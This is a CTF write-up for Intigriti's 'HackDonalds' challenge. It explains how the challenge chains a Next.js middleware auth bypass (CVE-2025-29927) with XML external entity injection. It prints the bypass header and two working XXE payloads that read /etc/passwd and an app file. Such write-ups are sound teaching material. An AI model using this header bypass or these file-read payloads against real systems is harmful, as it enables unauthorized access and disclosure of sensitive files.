# 0425: HackDonalds

| Name                                                                 | Authors                                                                                 | Category                                           |
| -------------------------------------------------------------------- | --------------------------------------------------------------------------------------- | -------------------------------------------------- |
| [Intigriti April Challenge (2024)](https://hackdonalds.intigriti.io) | [Bastien](https://twitter.com/_bastiendm) + [CryptoCat](https://twitter.com/_CryptoCat) | NextJS Middleware Auth Bypass, CVE-2025-29927, XXE |

[![](https://img.youtube.com/vi/KwD_TKZr0YY/0.jpg)](https://www.youtube.com/watch?v=KwD_TKZr0YY)

## Challenge Description

> Find the FLAG and win Intigriti swag! 🏆

## Useful Resources

* [Next.js Middleware Auth Bypass (CVE-2025-29927)](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)
* [XML External Entity Injection (XXE)](https://portswigger.net/web-security/xxe)

## Solution

Bastien (BAS10) made most of this challenge. I (CryptoCat) just made the UI *cough* ChatGPT *cough* and fixed a few bugs/unintended solutions. It's a lot easier than the typical Intigriti monthly challenge - thankfully, as it came only a week after the crazy chain by 0x999 in the [March '25 challenge](https://bugology.intigriti.io/intigriti-monthly-challenges/0325). Therefore, this one was run more informally, without all the usual prizes, promo, domain name etc.

### Recon

The challenge did not come with source code, so we must follow a black box approach.

#### Site Functionality

The website doesn't appear to have a lot of functionality; there's a homepage and a food menu.

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-1510a9cb4b87d58aa1ae5a27707b4cd9cdb1a639%2F0.PNG?alt=media)

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-d99df13e611787ecf4dbfe497ce14c5a48b3a9d4%2F1.PNG?alt=media)

There's also an admin section which, as hackers, should be interesting to us.

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-d44820bdd26ba0edec9f6404fef216db1a1b8e46%2F2.PNG?alt=media)

We might try some basic SQLi, default/common password etc. However, it will get us nowhere. Digging into the client-side code is also fairly unproductive - since it's a NextJS application, the code is hard to read and most of the important stuff is on the server-side.

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-23882a90c8b3083334984dbfee3a9c3554dedbf7%2F3.PNG?alt=media)

Wait, NextJS? Wasn't there some [crazy vulns](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware) discovered for it recently 🤔 Let's check the version with Wappalyzer 👀

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-a12b32fe2183eccfc6972b9643fdd409fb2ea9f8%2F4.PNG?alt=media)

Back to the advisory:

**CVE-2025-29927** affects **all Next.js versions from 11.1.4 up to 15.1.7** and allows **middleware bypass** via a specially crafted `x-middleware-subrequest` header.

Vulnerability confirmed ✅

### Next.js Middleware Auth Bypass (CVE-2025-29927)

Middleware in Next.js is commonly used for:

* Authentication / Authorization
* Rewrites / Redirects
* Adding security headers (CSP, etc.)

This vulnerability allows attackers to **bypass middleware protections entirely**, leading to:

* **Authorization bypass**
* **Content Security Policy (CSP) bypass**
* **DoS via Cache Poisoning (CPDoS)**

An auth bypass would be perfect for us! Maybe it can get us into the admin panel without knowing the password?

Let's request the `/admin` page while including the following HTTP header.

```json
x-middleware-subrequest: middleware
```

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-05417f917c004679e0402fcf2b26d43b3bfa0198%2F5.PNG?alt=media)

Easy! Now we just need to include this header on each request to maintain our access 😎

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-7a567e09c1f2a5284503d8e9614c74ff2634e0e1%2F6.PNG?alt=media)

We can only click on the `Ice Cream Machines` option, which allows us to view the settings of various machines (notoriously buggy/broken at HackDonalds 👀)

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-e812c6684f26f5e647574af83737857986f54ab5%2F7.PNG?alt=media)

### XML External Entity Injection (XXE)

So, what do we have here? An XML config input that can be parsed.

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-34d100118f3c1e1969a874e6703c3e4df1f167b2%2F8.PNG?alt=media)

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-f3140e15618bd09e0031421af149225c38049d3c%2F9.PNG?alt=media)

Any CTF player or bug bounty hunter should know what to check for here; XXE 👇

**XXE (XML External Entity)** is a vulnerability that occurs when an XML parser **processes external entities** defined in XML documents. If not properly configured, it can be exploited to:

* **Read local files** (`file:///etc/passwd`)
* **Perform SSRF** (e.g., hitting internal services)
* **DoS** via "billion laughs" attack
* **Exfiltrate data** via out-of-band channels (OAST, DNS, etc.)

If we replace the parsed input with a payload to read `/etc/passwd`

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

We successfully retrieve the file contents!

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-159e03f2a4dd485e343204c576d3b06c6668014a%2F10.PNG?alt=media)

#### Local File Read (Source Code Disclosure)

Where is the flag though? In a real world scenario, we might look for common files of interest (plenty of wordlists online). Since we know this is a NextJS app, why don't we ask ChatGPT what the common location is and what interesting files it might have?

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-874eab2dac7ea77982a41c36b60c7fc998c62eef%2F11.PNG?alt=media)

Nice, so we can try enumerating all of these files starting with the `/app/` directory 😼

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///app/package.json">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-3154e1c7681822816c3dc89faedcfd0c62d41db1%2F12.PNG?alt=media)

There we have our flag: `INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s}` 🚩

Some players retrieved the same file from `/proc/self/cwd/package.json` or simply `package.json`

## Community Writeups

1. [r0guebyte](https://rentry.co/r0gue-writeup-hackdonalds-dad1001f-2238-49ce-80e0-952a0a1cb944)
2. [excile](https://gist.github.com/excile1/56044173c39a28635f547f3bbedf05b5)
3. [gurux090](https://gurudattchoudhary.medium.com/intigriti-hackdonalds-ctf-writeup-chaining-next-js-fa0d8f6acbef)
4. [wa1m3im](https://gist.github.com/Wa1m3im/b0d1a087a9e363d66fc50cfdb8ea705f)
5. [optybg](https://www.notion.so/HackDonalds-Challenge-Writeup-1d39b56cbe8880ccb168ff03a9f60c8e?pvs=4)
6. [gilsgil](https://intigriti.hatamotosec.com/hackdonalds-writeup/ec4ac52ad1c4c88f1588fa68510cbaf8.html)
7. [boffman](https://gist.github.com/boffman/258bf6b13d59cbcfa507b15b414c3b2d)
8. [harshilsecops](https://medium.com/@harshilsecops/820933e85d99)
9. [ruur](https://ruur.gitbook.io/ctf-writeups/ctf-writeups/hackdonalds-intigriti)
10. [nagasaikiran](https://nagasaikiran.com/hackdonalds-challenge-writeup)
11. [khandlq](https://www.notion.so/Challenge-https-app-intigriti-com-programs-intigriti-challenge-hackdonalds-detail-1d0fde163055800cb1f1fbe8dff8f666?pvs=4)
12. [priesthood\_singh](https://medium.com/@adityagulati07/intigriti-hackdonalds-challenge-cb8d7e60ee7c)
13. [mami](https://github.com/MaMi364/Hackdonalds-Intigriti)
14. [roys](https://github.com/roys/ctf-writeups/tree/main/intigriti-2025-04)
15. [cybersecu](https://gist.github.com/Siss3l/7a6b55978214325f60464f4f92ecce07)
16. [juniorbrets](https://medium.com/@cipher01x/breaking-into-hackdonalds-xxe-middleware-abuse-ctf-writeup-5e67fadbb1bd)
17. [rishal865](https://www.linkedin.com/posts/mohammed-rishal-0453a8212_hackdonalds-ctf-activity-7318131723127468033-ilJJ)
18. [vilz](https://github.com/LuisVila99/hackdonalds)
19. [cybrik](https://medium.com/@shreechandragiri21/hacking-hackdonalds-from-auth-bypass-to-xxe-my-3-hour-midnight-frenzy-0a5e120af2b2)
20. [cybercrusader](https://medium.com/@vighnesh.cybersec/breaking-the-ice-cream-machines-a-hackdonalds-ctf-story-of-auth-bypass-and-xml-shenanigans-4d648eab7f33)